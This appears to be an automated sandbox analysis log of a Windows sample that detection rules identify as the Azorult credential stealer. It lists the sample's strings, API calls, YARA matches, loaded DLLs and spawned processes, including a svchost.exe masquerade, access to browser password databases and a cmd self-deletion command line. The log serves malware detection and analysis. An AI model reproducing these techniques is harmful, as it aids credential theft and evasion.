            Source: cJX8BV8LYG.exe, 00000000.00000000.1640302007.0000000000842000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_66f7cd72-5
            Source: cJX8BV8LYG.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fa8d29f7-7
            Source: cJX8BV8LYG.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_213b5097-2
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007ED5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_007ED5EB
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_007E1201
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_007EE8F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00403B98 appears 44 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00404E64 appears 33 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00404E3C appears 87 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004062D8 appears 34 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004034E4 appears 36 times
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: String function: 0079F9F2 appears 31 times
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: String function: 007A0A30 appears 46 times
            Source: api-ms-win-core-handle-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-string-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-synch-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-memory-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-sysinfo-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-debug-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-utility-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-environment-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processthreads-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-heap-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-console-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-process-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l2-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-runtime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-string-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-file-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-profile-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-libraryloader-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-localization-l1-2-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-datetime-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-time-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-locale-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processthreads-l1-1-1.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-namedpipe-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-filesystem-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-multibyte-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-stdio-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-util-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-errorhandling-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-math-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-private-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-processenvironment-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-interlocked-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-heap-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-rtlsupport-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-synch-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-conio-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-core-timezone-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: api-ms-win-crt-convert-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
            Source: cJX8BV8LYG.exe, 00000000.00000003.1705790864.0000000003A83000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cJX8BV8LYG.exe
            Source: cJX8BV8LYG.exe, 00000000.00000003.1704442789.0000000003C2D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cJX8BV8LYG.exe
            Source: cJX8BV8LYG.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
            Source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.svchost.exe.684a82d.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
            Source: 1.2.svchost.exe.68b5f7e.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
            Source: 1.2.svchost.exe.6828840.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
            Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
            Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
            Source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
            Source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@8/53@1/1
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007F37B5 GetLastError,FormatMessageW,0_2_007F37B5
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007E10BF AdjustTokenPrivileges,CloseHandle,0_2_007E10BF
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_007E16C3
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_007F51CD
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_0080A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0080A67C
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_007F648E
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Code function: 0_2_007842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_007842A2
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5740:120:WilError_03
            Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-8AD8678F-018EDCC9-C34A4F09
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | File created: C:\Users\user\AppData\Local\Temp\aut31FB.tmp
            Source: cJX8BV8LYG.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\svchost.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr | Binary or memory string: SELECT ALL id FROM %s;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.1.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.1.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
            Source: svchost.exe, 00000001.00000003.1765945641.0000000003671000.00000004.00000020.00020000.00000000.sdmp, 65132962348398743035428.tmp.1.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: cJX8BV8LYG.exe | ReversingLabs: Detection: 68%
            Source: unknown | Process created: C:\Users\user\Desktop\cJX8BV8LYG.exe "C:\Users\user\Desktop\cJX8BV8LYG.exe"
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cJX8BV8LYG.exe"
            Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: crtdll.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mozglue.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: winmm.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wsock32.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: vcruntime140.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: dbghelp.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: msvcp140.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: edputil.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: appresolver.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: slc.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: sppc.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: pcacli.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
